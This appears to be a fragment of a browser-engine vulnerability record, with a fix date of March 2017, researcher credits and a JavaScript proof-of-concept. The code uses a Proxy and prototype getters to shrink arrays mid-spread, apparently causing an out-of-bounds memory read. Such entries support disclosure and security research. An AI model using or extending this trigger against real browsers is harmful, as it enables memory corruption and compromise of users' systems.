- Fix: Mar 2017
- Credit: Qixun Zhao of Qihoo 360 Skyeye Labs, lokihart, Simon Zuckerbraun
PoC from tunz
let f = new Function("console.log(arguments[300]);");
let a = [1,2,3];
let b = [];
b.length = 1000;
b.fill(2);
let p = new Proxy([], {
get: function (oTarget, sKey) {
console.log("get");
a.length = 4; // Make a hole
return oTarget[sKey] || 0 || undefined;
},
});
b.__proto__ = p;
let proto = [];
Object.defineProperty(proto, 3, {get: function() {
console.log("hi")
b.length = 1;
return 4;
}});
a.__proto__ = proto;
f(1, ...a, ...b);